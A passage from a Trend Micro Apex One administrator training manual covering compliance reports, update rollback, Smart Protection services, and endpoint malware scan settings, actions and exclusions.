last Scan Now or Scheduled Scan lasted more than the specified number of hours.

A non-compliant Agent is counted at least twice in the Compliance Report.


• In the Endpoints with Outdated Scanning category
• In the category for which the Agent is non-compliant. For example, if the last Scheduled
Scan lasted more than the specified number of hours, the Agent is counted in the Scan Now
or Scheduled Scan exceeded <x> hours category. If the Agent satisfies more than one scan
compliance criteria, it is counted in each category for which it is non-compliant.

142 © 2019 Trend Micro Inc. Education


Lesson 6: Keeping Trend Micro Apex One Up To Date

Run Scan Now or Scheduled Scan on Agents that have not performed scan tasks or were unable to
complete scanning.

Settings
Security Compliance determines whether Agents and their parent domains in the Agent tree have
the same settings. The settings may not be consistent if you move any Agents to another domain
that is applying a different set of settings, or if any Agent user with certain privileges manually
configured settings on the Security Agent console.

A non-compliant Agent is counted at least twice in the Compliance Report.


• In the Endpoints with Inconsistent Configuration Settings category
• In the category for which the Agent is non-compliant. For example, if the scan method
settings in the Agent and its parent domain are not consistent, the Agent is counted in the
Scan Method category. If more than one set of settings is inconsistent, the Agent is counted
in each category for which it is non-compliant.

© 2019 Trend Micro Inc. Education 143


Lesson 6: Keeping Trend Micro Apex One Up To Date

To resolve the setting inconsistencies, apply domain settings to the Agent.

Update Summary
A summary report of updated online and offline Agents can be displayed. Click Updates > Update
Summary.

144 © 2019 Trend Micro Inc. Education


Lesson 6: Keeping Trend Micro Apex One Up To Date

Rollback
Rolling back updates refers to restoring previous versions of updated or replaced components in an
on-premise installation of Apex One. The ActiveUpdate module performs the rollback procedure
when:
• The update/patch application process cannot be completed because of an error. For
example, there was a problem extracting a compressed update.
• The administrator issues a rollback command from the Web Management console. This
means the update process itself was successfully completed, but the administrator wanted
to use previous components for some reason.

Note: Agents that are updated through Update Agents cannot be rolled back using the Web
Management console. The administrator must manually roll them back.

Rolling Back Patterns

When Agents receive a pattern rollback notification from the Server, they check the version of
the pattern file on the Server. If the version on the Server is older than that on the Agent, a
Force Update will be triggered and the Agents will roll back to the pattern file on the Server.

Note: Only full virus patterns can be rolled back from the Web Management console. Non-virus related
patterns, and virus-related incremental patterns, are not covered by rollback functionality at this
time.

© 2019 Trend Micro Inc. Education 145


Lesson 6: Keeping Trend Micro Apex One Up To Date

The Apex One Server retains the last five virus patterns, which can all be used for rolling back.
The Agent, on the other hand, only retains two older patterns.

Rolling Back Engines

When the scan engine files on the Server are updated, the following folder is created to store the
last versions of the scan engine:

…\PCCSRV\Download\Rollback

Records about the last scan engine versions are also stored in the rollback section of the
ofcscan.ini, for example:

[INI_ROLLBACK_SECTION]

RollBack_Previous_NT_Engine=6.810.1005

Note: Only the VSAPI scan engine can be rolled back from the Web Management console.

Both the Server and Agent retain the previous version of the scan engine for rollback purposes.

Server Tuner Tool


The Server Tuner Tool can be used to adjust the performance of Apex One updates. The tool can be
located in the following folder:
...\PCCSRV\Admin\Utility\SrvTune

146 © 2019 Trend Micro Inc. Education


Lesson 6: Keeping Trend Micro Apex One Up To Date

Download Settings
When the number of Security Agents (including Update Agents) requesting updates from the Apex
One Server exceeds the Server's available resources, the Server moves the Agent update request
into a queue and processes the requests when resources become available. After the Agent
successfully updates components from the Apex One Server, it notifies the Server that the update is
complete. Set the maximum number of minutes the Apex One Server waits to receive an update
notification from the Agent. Also set the maximum number of times the server tries to notify the
Agent to perform an update and to apply new configuration settings. The Server keeps trying only if
it does not receive Agent notification.
• Timeout for client: specifies how long the Apex One Server will wait for the Agent to
acknowledge the update as successful
• Timeout for update Agent: specifies how long the Apex One Server will wait for the Update
Agent to acknowledge the update as successful
• Retry count: specifies how many times the Server will attempt to update an Agent
• Retry interval: specifies how long the Apex One Server will wait before checking the update
queue

Network Traffic Settings


The Network Traffic section defines the hours of the day that constitute the normal, off-peak, and
peak hours in your network. The Maximum Client Connections specify the number of Agents that the
Server will notify about the updates at one time. There are two types of Agents:
• Apex One and other update source: Apex One Server or other update source (including
ActiveUpdate Server, and internal update web pages)
• Update Agent

Note: After the Server notifies the Agents that updates are available, the Agents will attempt to update
from their designated update sources. The number of Agents in the network and the network
resources will determine the best timeout value for the setting.

Default Settings
The Apex One Server waits up to 30 minutes for each notified Agent in a group to complete the
update sequence. If an Agent cannot finish the update within the 30 minutes time-frame, the Apex
One Server will notify the next Agent in queue. By default, an Agent attempts to download updates
from the Server up to five times at 15-minute intervals.

© 2019 Trend Micro Inc. Education 147


Lesson 6: Keeping Trend Micro Apex One Up To Date

Recommended Configurations for Improved Performance


In large networks, small maximum connection settings, shorter timeouts, and fewer retries may
update the Agents more quickly.

Under Network Traffic, specify the number of Agents the Server will notify at a time about the
updates. Since the Update Agents receive their updates before the Agents are notified, you need to
set the Timeout for Update Agent setting with sufficient time. The default setting of 10 minutes may
require an increase if the network is very large.

Update Utilities
Apex One includes utilities that can be used to schedule updates.

Domains Schedule Update Tool


This tool allows an organization to configure a schedule based on Agent Tree Domains. All Agents
belonging to the domain will apply the schedule. The dsu_convert.exe tool can be found in the
following folder:
...\PCCSRV\Admin\Utility\DomainScheduledUpdate

Scheduled Update Configuration Tool


This tool (SUCTool.exe) is used to enable and configure scheduled updates on an Update Agent
that was installed using Agent Packager. This tool is not available if the Update Agent was installed
using other installation methods.

148 © 2019 Trend Micro Inc. Education


Lesson 7: Trend Micro Smart Protection

Lesson 7: Trend Micro Smart Protection

Lesson Objectives:

After completing this lesson, participants will be able to:


• Define the Smart Protection Services used by Apex One
• Configure Smart Protection Sources

Smart Protection includes services that provide anti-malware signatures, web reputation credibility
scores, vulnerability patterns, in-the-cloud threat databases and more. Smart Protection Services used
by Apex One include:
• File Reputation Services
• Web Reputation Services
• Predictive Machine Learning Services
• Census Service
• Certified Safe Software Service
• Smart Feedback

File Reputation Services


File Reputation Services check the reputation of each file against an extensive in-the-cloud database.
Since the malware information is stored in the cloud, it is available instantly to all users. The cloud-
Agent architecture eliminates the burden of pattern deployment while significantly reducing the
overall Agent footprint.

Security Agents must be in Smart Scan mode to use File Reputation Services.

Web Reputation Services


With one of the largest domain-reputation databases in the world, Trend Micro Web reputation
technology tracks the credibility of Web domains by assigning a reputation score based on factors
such as a Website's age, historical location changes and indications of suspicious activities
discovered through malware behavior analysis. Web reputation then continues to scan sites and
block users from accessing infected ones. Web reputation features help ensure that the pages that
users access are safe and free from Web threats, such as malware, spyware, and phishing scams that
are designed to trick users into providing personal information. To increase accuracy and reduce
false positives, Trend Micro Web reputation technology assigns reputation scores to specific pages
or links within sites instead of classifying or blocking entire sites, since often, only portions of
legitimate sites are hacked and reputations can change dynamically over time.

© 2019 Trend Micro Inc. Education 149


Lesson 7: Trend Micro Smart Protection

Predictive Machine Learning Services


Apex One provides enhanced malware protection for unknown threats and zero-day attacks through
Predictive Machine Learning. Trend Micro Predictive Machine Learning uses advanced machine
learning technology to correlate threat information and perform in-depth file analysis to detect
emerging security risks through digital DNA fingerprinting, API mapping, and other file features.

Predictive Machine Learning is effective in protecting against security breaches that result from
targeted attacks using techniques such as phishing and spear phishing. In these cases, malware that
is designed specifically to target your environment can bypass traditional malware scanning
techniques.

During real-time scans, when Apex One detects an unknown or low-prevalence file, Apex One scans
the file using the Advanced Threat Scan Engine (ATSE) to extract file features. It then sends the
report to the Predictive Machine Learning engine which is hosted on the Trend Micro Smart
Protection Network. Through the use of malware modeling, Predictive Machine Learning compares
the sample to the malware model, assigns a probability score, and determines the probable malware
type that the file contains. If the file is identified as a threat, Apex One quarantines the file to
prevent the threat from continuing to spread across your network.

Census Service
This service provides information about the prevalence of detected files. Prevalence is a statistical
concept referring to the number of times a file was detected by Trend Micro sensors at a given time.
If a file has not triggered any detections, the file becomes suspicious as over 80% of all malware is
only seen once.

Census covers over 300 million distinct executable files. File prevalence and maturity is important
because polymorphism is the primary weapon of malware. An unknown binary can mean a possible
targeted attack.

Certified Safe Software Service


The Certified Safe Software Service provides a comprehensive list of applications considered to be
safe by Trend Micro. The list includes most popular operating system files and binaries as well as
applications for desktops, servers, and mobile devices. Trend Micro periodically provides updates to
the list.

Certified Safe Software Service queries Trend Micro datacenters to check submitted sample files
and objects against these databases. White listing known good files is used to:
• Reduce false positives
• Save computing time and resources
• Provide a mechanism for locking down systems from any undesired infiltration

Sources for the Certified Safe Software Service include:


• Internal sources, such as the File Reputation Service, Tech Support, All Trend Release Builds,
etc.
• Partnerships with other tech companies, including Adobe, Apple, Google, Mozilla, Cisco,
Acer, VMWare, Yahoo!, Citrix, Intel, Intuit, Bigfish Games, Electronics Arts, etc.

150 © 2019 Trend Micro Inc. Education


Lesson 7: Trend Micro Smart Protection

• Targeted, pro-active sourcing including software download sources, such as Cnet


download.com, Majorgeeks, Softpedia, Sourceforge, crawlers, etc.
• Subscriptions, including National Software Reference Library, MSDN, and some regional
magazines (especially from Europe) that include DVDs/applications
• Local sourcing teams for P regional file collection
• GRID (Good Reputation Index Database), the world’s largest goodware catalog with over 700
million unique files and 130+ Grid Partners
• Customer Submission, for example, through Customer Support

Smart Feedback
Trend Micro Smart Feedback provides continuous communication between Trend Micro products
and its 24/7 threat research centers and technologies. Each new threat identified through every
single customer's routine reputation check automatically updates all Trend Micro threat databases,
blocking any subsequent customer encounters of a given threat.

By continuously processing the threat intelligence gathered through its extensive global network of
customers and partners, Trend Micro delivers automatic, real-time protection against the latest
threats and provides better together security, much like an automated neighborhood watch that
involves the community in the protection of others. Because the gathered threat information is
based on the reputation of the communication source, not on the content of the specific
communication, the privacy of a customer's personal or business information is always protected.

Samples of information sent to Trend Micro through Smart Feedback include:


• File checksums
• Websites accessed
• File information, including sizes and paths
• Names of executable files

You can terminate your participation to the program anytime from the Web Management console.
You do not need to participate in Smart Feedback to protect your endpoints. Your participation is
optional and you may opt out at any time. Trend Micro recommends that you participate in Smart
Feedback to help provide better overall protection for all Trend Micro customers.

Service URLs
The URLs used by the Security Agent to communicate with these services include:
• Predictive Machine Learning: osce140-en-f.trx.trendmicro.com or
osce140-en-b.trx.trendmicro.com
• ActiveUpdate: osce14-p.activeupdate.trendmicro.com/activeupdate
• Census: osce14-en-census.trendmicro.com
• Certified Safe Software Service: osce14-en.gfrbridge.trendmicro.com
• Web Reputation: osce14-0-en.url.trendmicro.com
• Smart Scan: osce14.icrc.trendmicro.com/tmcss
• Smart Feedback: osce140-en.fbs25.trendmicro.com

© 2019 Trend Micro Inc. Education 151


Lesson 7: Trend Micro Smart Protection

Smart Protection Sources


The Smart Protection source can be either:
• Trend Micro Smart Protection Network
• Smart Protection Server

Trend Micro Smart Protection Network


The Trend Micro Smart Protection Network is a cloud-client content security infrastructure designed
to protect customers from security risks and Web threats. It powers both on-premise and Trend
Micro hosted solutions to protect users whether they are on the network, at home, or on the go.
Protection is automatically updated and strengthened as more products, services and users access
the network, creating a real-time neighborhood watch protection service for its users.

Smart Protection Server


Smart Protection Servers are for users who have access to their local corporate network. Local
servers localize Smart Protection Services, including File Reputation and Web Reputation, to the
corporate network to optimize efficiency.There are two types of Smart Protection Servers:
• Integrated Smart Protection Server
• Standalone Smart Protection Server

Integrated Smart Protection Server

The Integrated Smart Protection Server is installed on the Apex One Server. It can be installed
during Apex One Server installation or at later point by using the Integrated Smart Protection
Server Installation Tool located in:
...\PCCSRV\Admin\Utility\ISPSInstaller\

This server is only recommended for networks with 1,000 Agents or less, and for test
deployments.

152 © 2019 Trend Micro Inc. Education


Lesson 7: Trend Micro Smart Protection

The Integrated Smart Protection Server can be enabled through the Apex One Web Management
console.

Enabling or disabling the services related to Smart Protection Server changes the corresponding
parameter in the Ofcserver.ini file. The Apex One Master Service is directly responsible for
starting and stopping the Integrated Smart Protection Server service (iCRCService.exe) in
response to Web Management console commands.

Standalone Smart Protection Server

The Standalone Smart Protection Server is recommended in the following situations:


• Larger networks of 1000 Agents or more
• Performance issues on Apex One server or not enough resources to contain an
integrated SPS
• Remote office VPN with low bandwidth communication with the Apex One server
• For Load Balancing and High Availability

This server is available as a VMware image that runs CentOS and is compatible with the following
virtual servers:
• VMware ESXi Server 6.5, 6.0 Update 2 and 5.5 Update 3b
• Microsoft Windows Server 2008 R2 with Hyper-V
• Microsoft Windows Server 2012 with Hyper-V
• Microsoft Windows Server 2012 R2 with Hyper-V
• Microsoft Windows Server 2016 with Hyper-V
• Citrix XenServer 7.2, 7.1, 6.5

The following table defines and highlights the differences between the Smart Protection
Network and Local Smart Protection Servers:

© 2019 Trend Micro Inc. Education 153


Lesson 7: Trend Micro Smart Protection

Smart Protection Network Local Smart Protection Servers


External Agents: Agents that don't
meet the location criteria specified on Internal Agents: Agents that meet the
Availability location criteria specified on the Apex
the Apex One Web Management
One Web Management console
console
A globally scaled Internet-based
infrastructure that provides Smart A local Smart Protection Service for
Purpose Protection Services to Agents that do the corporate network used to
not have immediate access to their optimize efficiency
corporate network
File Reputation: HTTP, HTTPS
Connection Protocol HTTPS
Web Reputation: HTTP only
Administration Trend Micro Apex One Server administrator
Pattern Update
Source Trend Micro ActiveUpdate Trend Micro ActiveUpdate

Integrated: Installed on the same


computer where the Apex One Server
Types n/a is deployed
Standalone: Installed on a VMware or
Hyper-V server or Citrix XenServer

154 © 2019 Trend Micro Inc. Education


Lesson 7: Trend Micro Smart Protection

Configuring the Agent Smart Protection Source


Agents send queries to Smart Protection sources (the Trend Micro Smart Protection Network, or a local
Smart Protection Server) when scanning for security risks and determining a Website’s reputation.

Switch

Security Agent

Smart Protection
Server
(integrated or standalone)

Security Agents can switch between these Smart Protection sources based on their location relative to
the corporate network. When the Agent detects that it is outside the corporate network, it will look for
the Trend Micro Smart Protection Network, and when it is inside the network, it will look for pre-
designated Smart Protection Servers.

To reduce the possibility of going off-line, Security Agents can be assigned multiple Smart Protection
Servers. If the Agent is unable to query one Smart Protection Server, it can switch to an alternative
Smart Protection Server if another is available, thereby avoiding a single-point-of-failure for cloud
scanning functionality.

Note: If an Agent is internal and cannot connect to an internal Smart Protection Server, it will not
automatically connect to the Global Smart Protection Server unless the URL of that server
appears in the list.

© 2019 Trend Micro Inc. Education 155


Lesson 7: Trend Micro Smart Protection

156 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Lesson 8: Protecting Endpoint


Computers From Malware

Lesson Objectives:

After completing this lesson, participants will be able to:


• Configure malware and grayware scanning
• Quarantine malware
• Describe SmartScan
• Configure and enable Outbreak Prevention

Apex One protects endpoint computers against malicious software, such as viruses, spyware,
ransomware, Trojans and other malware. Different scanning techniques protect against known and
unknown malware.

Scanning for Malware


Security Agents scan endpoint computers for malware through one of the following methods:
• Real-time Scan: This method scans files, folders and URLs as soon as they are accessed,
triggered by I/O event hooking.
• Manual Scan: This method scans files and folders on demand, when initiated by the end user.
• Scheduled Scan: This method uses the same scanning methods and has the same detection
capabilities as used for on-demand scanning. Scheduled scans are, however, triggered
automatically based on a selected frequency (daily, weekly or monthly) and a specified time.
• Scan Now: This method scans files and folders on demand on one or more target computers
when initiated by the Administrator.

NT Real-time Scan Service


The NT Real-time Scan Service performs on-demand (Manual, Scheduled, Scan Now), and Real-time
scanning functionality. This service (NTRtScan.exe) uses the following scan engines:
• Virus Scanning API (VSAPI)
• Spyware Scanning API (SSAPI)
• Damage Cleanup Engine (DCE)
• Advanced Threat Scan Engine (ATSE)

This service also assumes responsibility for starting the Unauthorized Change Prevention Service
(TMBMSRV.exe).

© 2019 Trend Micro Inc. Education 157


Lesson 8: Protecting Endpoint Computers From Malware

When applications access or create files on the file system, they send information to the Microsoft
I/O Manager. This is true for both legitimate applications and malware. To be able to differentiate
between legitimate and malicious I/O events, and deal with them if they are of the latter variety,
Trend Micro products need a way to monitor these events as they occur, evaluate them, and then
take action when necessary.

Apex One registers with the Microsoft I/O Manager to identify file access and modification events on
the file system. This registration also grants Apex One access to the file when scanning is required.

Create/write Read
requests requests

Microsoft
Apex One
I/O Manager

Scan Settings
These settings determine which files on the Security Agent host are scanned in each of the four
scanning types. Scanning is a resource intensive process. Judicious use of scanning coverage options
can strike a balance between security and minimizing the impact of scanning events on the network.

Each of the four scan types may have slightly different configuration options and include setting
collections displayed through the following tabs:
• Scan Target: This tab defines how the Security Agent looks for files to scan.
• Scan Action: This tab defines the action to be taken when malware is detected.
• Scan Exclusion: This tab defines scan exclusions to increase the scanning performance and skip
scanning files causing false alarms. When a particular scan type runs, Apex One checks the scan
exclusion list to determine which files on the endpoint will be excluded from both virus/malware
and spyware/grayware scanning. When you enable scan exclusion, Apex One will not scan a file
under the following conditions:
- The file is found under a specific directory (or any of its sub-directories).
- The file name matches any of the names in the exclusion list.
- The file extension matches any of the extensions in the exclusion list.

158 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Real-Time Scan Settings


These settings are used when Real-time scanning is enabled on Security Agents.

Real-Time Scan Target Tab

User Activity on Files Section


• Scan files being: Files will be scanned when they are created/modified, retrieved or both

Files to Scan Section


• All scannable files: Scans all files
• File types scanned by IntelliScan: IntelliScan is a method of identifying files to scan. For
executable files (for example, .exe), the true file type is determined based on the file
content. For non-executable files (for example, .txt), the true file type is determined based
on the file header. Using IntelliScan provides the following benefits:
- Performance optimization: IntelliScan does not affect applications on the Agent because
it uses minimal system resources.

© 2019 Trend Micro Inc. Education 159


Lesson 8: Protecting Endpoint Computers From Malware

- Shorter scanning period: Because IntelliScan uses true file type identification, it only
scans files that are vulnerable to infection. The scan time is therefore significantly
shorter than when you scan all files.
• Files with the following extensions: Only scan files whose extensions are included in the file
extension list. Add new extensions or remove any of the existing extensions.

Scan Settings Section

Scan floppy disk during system shutdown: Real-time Scan scans any floppy disk for boot viruses
before shutting down the endpoint. This prevents any virus/ malware from executing when a
user reboots the endpoint from the disk.

Scan network drive: Scans network drives or folders mapped to the Security Agent endpoint
during Manual Scan or Real-time Scan.

Scan the boot sector of the USB storage device after plugging in: Automatically scans only the
boot sector of a USB storage device every time the user plugs it in (Real-time Scan).

Scan all files in removable storage devices after plugging in: Automatically scans all files on a
USB storage device every time the user plugs it in (Real-time Scan).

Quarantine malware variants detected in memory: Behavior Monitoring scans the system
memory for suspicious processes and Real-time Scan maps the process and scans it for malware
threats. If a malware threat exists, Real-Time scan quarantines the process and/or file.

Note: This feature requires that administrators enable the Unauthorized Change Prevention Service
and the Advanced Protection Service.

Scan compressed files: Allows Apex One to scan up to a specified number of compression layers
and skip scanning any excess layers. Apex One also cleans or deletes infected files within
compressed files. For example, if the maximum is two layers and a compressed file to be scanned
has six layers, Apex One scans two layers and skips the remaining four. If a compressed file
contains security threats, Apex One cleans or deletes the file.

Note: Apex One treats Microsoft Office 2007 files in Office Open XML format as compressed files.
Office Open XML, the file format for Office 2007 applications, uses ZIP compression
technologies. If you want files created using these applications to be scanned for viruses/
malware, you need to enable scanning of compressed files.

Scan OLE objects: When a file contains multiple Object Linking and Embedding (OLE) layers,
Apex One scans the specified number of layers and ignores the remaining layers.

Detect exploit code in OLE files: OLE Exploit Detection heuristically identifies malware by
checking Microsoft Office files for exploit code. The specified number of layers is applicable to
both Scan OLE objects and Detect exploit code options.

Enable IntelliTrap: Detects and removes virus/malware on compressed executable files. Virus
writers often attempt to circumvent virus filtering by using real-time compression algorithms.
IntelliTrap helps reduce the risk of such viruses entering the network by blocking real-time

160 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

compressed executable files and pairing them with other malware characteristics. Because
IntelliTrap identifies such files as security risks and may incorrectly block safe files, consider
quarantining (not deleting or cleaning) files after enabling IntelliTrap. If users regularly
exchange real-time compressed executable files, disable IntelliTrap.his option is available only
for Real-time Scan.

Enable CVE exploit scanning for files downloaded through web and email channels: Blocks
processes that attempt to exploit known vulnerabilities in commercially available products based
on the Common Vulnerabilities and Exposures (CVE) system. This option is available only for
Real-time Scan.

© 2019 Trend Micro Inc. Education 161


Lesson 8: Protecting Endpoint Computers From Malware

Real-Time Scan Action Tab

When the Security Agent detects malware, it can take the actions defined on this tab.

162 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Virus/Malware Section

Use ActiveAction: With this option, the administrator relies on Trend Micro action
recommendations that are stored within the VSAPI pattern. Trend Micro Anti-virus engineers
determine these actions based on their analysis of various malware types. Customizing the
action allows the administrator to control the scan action according to the network's specific
needs.

Use the same action for all virus/malware types: Select this option if you want the same action
performed on all types of virus/malware, except probable virus/malware. If you choose Clean as
the first action, select a second action that Apex One performs if cleaning is unsuccessful. If the
first action is not Clean, no second action is configurable. If you choose Clean as the first action,
Apex One performs the second action when it detects probable virus/malware.

Use a Specific Action for Each Virus/Malware Type: Manually select a scan action for each virus/
malware type. For all virus/malware types except probable virus/malware, all scan actions are
available. If you choose Clean as the first action, select a second action that Apex One performs
if cleaning is unsuccessful. If the first action is not Clean, no second action is configurable.
• Pass: The Agent does nothing to the malware.
• Rename: Encrypt and rename the infected file. The Agent uses scan engine functions to
change the file's extension to .VIR, (or to .VI0, .VI1 and so on). If a virus is found and the
virus action is Rename, the action performed will be Clean or, if uncleanable, Quarantine.
A compressed file with an infected file inside will be renamed.
• Quarantine: The Security Agent moves malware to a quarantine folder to an Agent, and
then to a quarantine folder on the Apex One Server.
• Clean: Remove the virus code from the file. The Agent can only clean files within ZIP/
LHA files up to one layer of compression.
• Delete: Delete the infected file. The Agent can delete files within ZIP/LHA file up to 6
layers of compression.
• Deny Access: Prevent access to infected file.

Note: Probable malware refers to suspicious files that have some of the characteristics of viruses/
malware.

Display a Notification Message When Virus/Malware is Detected: When Apex One detects virus/
malware during Real-time Scan and Scheduled Scan, it can display a notification message to
inform the user about the detection. To modify the notification message, select Virus/Malware
from the Type drop-down in Administration > Notifications > Agent.

Display a Notification Message When Probable Virus/ Malware is Detected: When Apex One
detects probable virus/malware during Real-time Scan and Scheduled Scan, it can display a
notification message to inform the user about the detection. To modify the notification message,
select Virus/Malware from the Type drop-down in Administration > Notifications > Agent.

Back Up Files Before Cleaning: If Apex One is set to clean an infected file, it can first back up the
file. This allows you to restore the file in case you need it in the future. Apex One encrypts the
backup file to prevent it from being opened, and then stores the file in the identified folder.

© 2019 Trend Micro Inc. Education 163


Lesson 8: Protecting Endpoint Computers From Malware

Run cleanup when probable virus/malware is detected: You can only select this option if the
action on probable virus/malware is not Pass or Deny Access. For example, if the Security Agent
detects probable virus/malware during Real-time Scan and the action is quarantine, the Security
Agent first quarantines the infected file and then runs cleanup if necessary. The cleanup type
(standard or advanced) depends on your selection.

Spyware/Grayware Section

Clean: Apex One terminates processes or delete registries, files, cookies, and shortcuts. After
cleaning spyware/grayware, Apex One agents back up spyware/ grayware data, which you can
restore if you consider the spyware/ grayware safe to access.

Deny access: Apex One denies access (copy, open) to the detected spyware/grayware
components.

Display a notification on endpoints when spyware/grayware is detected: When Apex One detects
spyware/grayware during Real-time Scan and Scheduled Scan, it can display a notification
message to inform the user about the detection.

164 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Real-Time Scan Exclusion Tab

Configure scan exclusions to increase the scanning performance and skip scanning files causing
false alarms. When a particular scan type runs, Apex One checks the scan exclusion list to
determine which files on the endpoint will be excluded from both virus/malware and spyware/
grayware scanning.

Scan exclusions are stored in the Windows Registry on the endpoint computer.

Scan Exclusion Section

Enable scan exclusions: Enables the use of the Scan exclusions described on this tab.

Apply scan exclusion settings to all scan types: Enables the scan exclusions list to be used,
regardless of the scan type.

© 2019 Trend Micro Inc. Education 165


Lesson 8: Protecting Endpoint Computers From Malware

Scan Exclusion List (Directories): Apex One will not scan all files found under a specific directory
on the computer. You can specify a maximum of 256 directories. By excluding a directory from
scans, Apex One automatically excludes all of the directory’s sub-directories from scans.
• Exclude directories where Trend Micro products are installed: If you select this option,
Apex One automatically excludes the directories of many Trend Micro products from
scanning.

Scan Exclusion List (Files): Apex One will not scan a file if its file name matches any of the names
included in this exclusion list. If you want to exclude a file found under a specific location on the
endpoint, include the file path, such as C:\Temp\sample.jpg. You can specify a maximum of
256 files.

Scan Exclusion List (File Extensions): Apex One will not scan a file if its file extension matches
any of the extensions included in this exclusion list. You can specify a maximum of 256 file
extensions. A period (.) is not required before the extension.
• For Manual Scan, Scheduled Scan, and Scan Now, use a question mark (?) to replace a
single character or an asterisk (*) to replace multiple characters as wildcard characters.
For example, if you do not want to scan all files with extensions starting with D, such as
DOC, DOT, or DAT, type D* or D??.

Note: Real-time Scan does not support the use of wildcard characters when specifying extensions.

166 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Manual Scan Settings


Manual Scan is an on-demand scan and starts immediately after a user runs the scan on the Apex
One agent console. The time it takes to complete scanning depends on the number of files to scan
and the Apex One agent endpoint's hardware resources.

Manual Scan Target Tab

Scan Settings Section

Scan hidden folders: Allows Security Agents to detect and then scan hidden folders on the
endpoint during Manual Scan

Scan boot area: Scans the boot sector of the hard disk for virus/malware during Manual Scan,
Scheduled Scan and Scan Now.

CPU Usage Section

Apex One can pause after scanning one file and before scanning the next file. This setting is used
during Manual Scan, Scheduled Scan, and Scan Now.
• High: No pausing between scans

© 2019 Trend Micro Inc. Education 167


Lesson 8: Protecting Endpoint Computers From Malware

• Medium: Pause between file scans if CPU consumption is higher than 50%, and do not
pause if 50% or lower
• Low: Pause between file scans if CPU consumption is higher than 20%, and do not pause
if 20% or lower

If you choose Medium or Low, when scanning is launched and CPU consumption is within
the threshold (50% or 20%), Apex One will not pause between scans, resulting in faster
scanning time. Apex One uses more CPU resource in the process but because CPU
consumption is optimal, endpoint performance is not drastically affected. When CPU
consumption begins to exceed the threshold, Apex One pauses to reduce CPU usage,
and stops pausing when consumption is within the threshold again. If you choose High,
Apex One does not check the actual CPU consumption and scans files without pausing.

168 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Manual Scan Action Tab

Virus/Malware Section

Damage Cleanup Services: Damage Cleanup Services cleans computers of file-based and
network viruses, and virus and worm remnants (Trojans, registry entries, and viral files). The
Agent triggers Damage Cleanup Services before or after virus/malware scanning, depending on
the scan type.
• Standard cleanup: The Security Agent performs any of the following actions during
standard cleanup:
- Detects and removes live Trojans
- Kills processes that Trojans create
- Repairs system files that Trojans modify
- Deletes files and applications that Trojans drop
• Advanced cleanup: In addition to the standard cleanup actions, the Security Agent stops
activities by rogue security software (also known as FakeAV) and certain rootkit
variants. The Security Agent also uses advanced cleanup rules to proactively detect and
stop applications that exhibit FakeAV and rootkit behavior.

© 2019 Trend Micro Inc. Education 169


Lesson 8: Protecting Endpoint Computers From Malware

Manual Scan Exclusion Tab

170 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Scheduled Scan Settings


Scheduled Scan runs automatically on the appointed date and time. Use Scheduled Scan to
automate routine scans on the agent and improve scan management efficiency.

Scheduled Scan Target Tab

Schedule Section

Configure how often (daily, weekly, or monthly) and what time Scheduled Scan will run. For
monthly Scheduled Scans, you can choose either a particular day of a month or a day of a week
and the order of its occurrence.

© 2019 Trend Micro Inc. Education 171


Lesson 8: Protecting Endpoint Computers From Malware

Scheduled Scan Action Tab

172 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Scheduled Scan Exclusion Tab

© 2019 Trend Micro Inc. Education 173


Lesson 8: Protecting Endpoint Computers From Malware

Scan Now Settings


Scan Now is initiated remotely by administrators through the web console and can be targeted to
one or several Apex One agent endpoints.

Scan Now Target Tab

174 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Scan Now Action Tab

© 2019 Trend Micro Inc. Education 175


Lesson 8: Protecting Endpoint Computers From Malware

Scan Now Scan Exclusion Tab

176 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Trusted Program List


You can configure Security Agents to skip scanning of trusted processes during Real-time, Behavior
Monitoring, Data Leak Prevention and Device Control scans (Scheduled, Manual and Scan Now scans
do not make use of the Truster Program List). Add trusted programs to the Trusted Program List to
improve the performance of scanning on endpoints.

You can add program files to the Trusted Programs List if the following requirements are met:
• The program file is not located in the Windows system folder.
• The program file has a valid digital signature.

In the Apex One Web Management console, click Agents > Agent Management and right-mouse click
specific domains or Agents. Click Settings > Trusted Program List and type the full program path of
the program to exclude from the list.

Scan Caching
The Security Agent can build a digital signature and on-demand scan cache files to improve its scan
performance. When an on-demand scan runs, the Security Agent first checks the digital signature
cache file and then the on-demand scan cache file for files to exclude from the scan. Scanning time is
reduced if a large number of files are excluded from the scan.

© 2019 Trend Micro Inc. Education 177


Lesson 8: Protecting Endpoint Computers From Malware

In the Apex One Web Management console, click Agents > Agent Management and right-mouse click
the root domain, specific domains or Agents. Click Settings > Privileges and Other Settings.

Digital Signature Cache

Agents do not scan files whose signatures have been added to the digital signature cache file.

The Security Agent uses the same Digital Signature Pattern used for Behavior Monitoring to
build the digital signature cache file. The Digital Signature Pattern contains a list of files that
Trend Micro considers trustworthy and therefore can be excluded from scans.

Agents build the digital signature cache file according to a schedule, which is configurable from
the Web Management console. Agents do this to:
• Add the signatures of new files that were introduced to the system since the last cache
file was built.
• Remove the signatures of files that have been modified or deleted from the system.

During the cache building process, Agents check the following folders for trustworthy files and
then adds the signatures of these files to the digital signature cache file:
• %PROGRAMFILES%
• %WINDIR%

Other folders are not checked for trustworthy files. The cache building process does not affect
the endpoint's performance because Agents use minimal system resources during the process.
Agents are also able to resume a cache building task that was interrupted for some reason (for
example, when the host machine is powered off or when a wireless endpoint's AC adapter is
unplugged).

178 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

On-demand Scan Cache

Security Agents do not scan files whose caches have been added to the on-demand scan cache
file.

Each time scanning runs, the Security Agent checks the properties of threat-free files. If a
threat-free file has not been modified for a certain period of time (the time period is
configurable), the Security Agent adds the cache of the file to the on-demand scan cache file.
When the next scan occurs, the file will not be scanned if its cache has not expired.

